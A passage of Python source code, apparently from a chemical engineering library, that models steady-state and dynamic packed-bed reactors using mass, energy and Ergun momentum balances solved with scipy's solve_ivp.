# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = rmtUtil.moleFractionFromConcentrationSpecies(CoSpi)
# MoFri2 = rmtUtil.moleFractionFromConcentrationSpecies(MoFlRai)
# interstitial gas velocity [m/s]
InGaVe = rmtUtil.calSuperficialGasVelocityFromEOS(MoFl, P, T)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
# Ri2 = 1000*np.array(PackedBedReactorClass.modelReactions(
# P, T, MoFri, CaBeDe))
# loop
loopVars0 = (T, P, MoFri, CoSpi)
# component formation rate [mol/m^3.s]
# check unit
RiLoop = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
Ri = np.copy(RiLoop)
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
# ri = np.zeros(compNo)
# for k in range(compNo):
# # reset
# _riLoop = 0
# for m in range(len(reactionStochCoeff)):
# for n in range(len(reactionStochCoeff[m])):
# if comList[k] == reactionStochCoeff[m][n][0]:
# _riLoop += reactionStochCoeff[m][n][1]*Ri[m]
# ri[k] = _riLoop
# call [mol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri)
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'J/m^3.s')
# diff/dt
dxdt = []
# loop vars
# FIXME
# const_F1 = 1/(CrSeAr*BeVoFr)
const_F1 = 1/(CrSeAr)
const_T1 = MoFl*CpMeanMixture
const_T2 = MoFlRa*CpMeanMixture/CrSeAr
# mass balance (molar flowrate) [mol/s]
for i in range(compNo):
dxdt_F = (1/const_F1)*ri[i]
dxdt.append(dxdt_F)
# flux
dxdt_Fl = OvR
dxdt.append(dxdt_Fl)
# energy balance (temperature) [K]
dxdt_T = (1/const_T1)*(-OvHeReT + Qm)
dxdt.append(dxdt_T)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
return dxdt
# NOTE
# dynamic homogenous modeling
def runM2(self):
"""
M2 modeling case
dynamic model
unknowns: Ci, T (dynamic), P (static)
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# total var no along the reactor length
varNoT = varNo*zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (varNo, zNo)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for i in range(compNo):
for j in range(zNo):
IV2D[i][j] = SpCoi0[i]
for j in range(zNo):
IV2D[indexTemp][j] = T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"zNo": zNo,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
"dz": dz
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"reactionRateExpr": reactionRateExpr,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
}
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM2,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise
# time interval
dataTime = sol.t
# all results
dataYs = sol.y
# component concentration [mol/m^3]
dataYs1 = dataYs[0:varNoCon, -1]
# 2d matrix
dataYs1_Reshaped = np.reshape(dataYs1, (compNo, zNo))
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1_Reshaped, axis=0)
dataYs1_MoFri = dataYs1_Reshaped/dataYs1_Ctot
# temperature - 2d matrix
dataYs2 = np.array([dataYs[varNoCon:varNoT, -1]])
# combine
_dataYs = np.concatenate((dataYs1_MoFri, dataYs2), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCons": dataYs1_Reshaped,
"dataYTemp": dataYs2,
"dataYs": _dataYs
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling [M2] for opT: {opT} with zNo: {zNo}, tNo: {tNo}"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM2(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M2 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
zNo: number of finite difference in the z direction
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
dz: differential length [m]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expression
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# dz [m]
dz = const['dz']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# zNo
zNo = const['zNo']
# var no.
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# superficial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate
Ri_z = np.zeros((zNo, reactionListNo))
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
# species concentration [kmol/m^3]
CoSpi = np.zeros(compNo)
# reaction rate
ri = np.zeros(compNo)
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (varNo, zNo))
# -> concentration [mol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
for i in range(compNo):
_SpCoi = yLoop[i, :]
SpCoi_z[i, :] = _SpCoi
# temperature [K]
T_z = np.zeros(zNo)
T_z = yLoop[indexT, :]
# diff/dt
# dxdt = []
# matrix
dxdtMat = np.zeros((varNo, zNo))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(zNo):
## block ##
# FIXME
# concentration species [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# temperature [K]
T = T_z[z]
# pressure [Pa]
P = P_z[z]
## calculate ##
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# NOTE
# REVIEW
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaBeDe[kgcat/m^3]
# SpCoi conversion
_SpCoi = 1e3*CoSpi
# loop
loopVars0 = (T, P, MoFri, _SpCoi)
# check unit
RiLoop = 1e-3*np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
Ri_z[z, :] = RiLoop
# REVIEW
# component formation rate [kmol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_z[z, :])
# overall formation rate [kmol/m^3.s]
OvR = np.sum(ri)
# NOTE
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT = np.dot(Ri_z[z, :], HeReT)
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
const_T1 = MoFl*CpMeanMixture
const_T2 = 1/(CoSp*CpMeanMixture*BeVoFr + (1-BeVoFr)*CaDe*CaSpHeCa)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
Ci_b = SpCoi0[i]
else:
# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# mass balance
dxdt_F = const_F1*(-SuGaVe*dCdz + ri[i])
dxdtMat[i][z] = dxdt_F
# energy balance (temperature) [K]
# temp [K]
T_c = T_z[z]
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
# backward difference
dTdz = (T_c - T_b)/dz
dxdt_T = const_T2*(-const_T1*dTdz + (-OvHeReT + Qm))
dxdtMat[indexT][z] = dxdt_T
# flat
dxdt = dxdtMat.flatten().tolist()
print("time: ", t)
return dxdt
# NOTE
# steady-state homogenous modeling
def runM3(self):
"""
M3 modeling case
steady-state modeling
not exactly plug-flow as dv/dz = 0
unknowns: Ci, T, P
velocity is calculated from EOS consiering feed Tf, Pf, Cf
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# model info
modelId = self.modelInput['model']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# REVIEW
# inlet species concentration [mol/m^3]
SpCoi0 = 1*np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [mol/m^3]
SpCo0 = np.sum(SpCoi0)
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# var no (Ci,T,P)
varNo = compNo + 2
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = SpCoi0
IV[indexTemp] = T
IV[indexPressure] = P
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
},
"reactionRateExpr": reactionRateExpr,
}
# save data
# timesNo = solverSetting['S3']['timesNo']
timesNo = solverSetting['M9']['zNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM3,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# concentration [mol/m^3]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert molar flowrate to mole fraction
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ctot
# temperature
dataYs2 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure
dataYs3 = sol.y[indexPressure, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2]), axis=0)
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State Modeling {modelId} with timesNo: {timesNo} within {elapsed}"
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -1], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# plot result
# pltc.plots2D(dataList[0:compNo], "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexFlux], "Reactor Length (m)",
# "Flux (kmol/m^2.s)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexTemp], "Reactor Length (m)",
# "Temperature (K)", "1D Plug-Flow Reactor")
else:
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _dataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM3(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M3 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [mol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [mol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
# concentration species [mol/m^3]
CoSpi = y[0:compNo]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# total flowrate [mol/s]
# [mol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [mol/s]
MoFlRai = MoFlRa*MoFri
# FIXME
# molar flux [mol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# momentum equation
# REVIEW
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
# Ri = 1000*np.array(PackedBedReactorClass.modelReactions(
# P, T, MoFri, CaBeDe))
# loop
loopVars0 = (T, P, MoFri, CoSpi)
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri = r0
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
# call [mol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri)
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# NOTE
#
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = Ua*(Tm - T)
# NOTE
# diff/dt
dxdt = []
# loop vars
const_C1 = 1/SuGaVe
const_T1 = 1/(MoFl*CpMeanMixture)
# mass balance (concentration) [mol/m^3]
for i in range(compNo):
dxdt_Ci = const_C1*ri[i]
dxdt.append(dxdt_Ci)
# energy balance (temperature) [K]
dxdt_T = const_T1*(-OvHeReT + Qm)
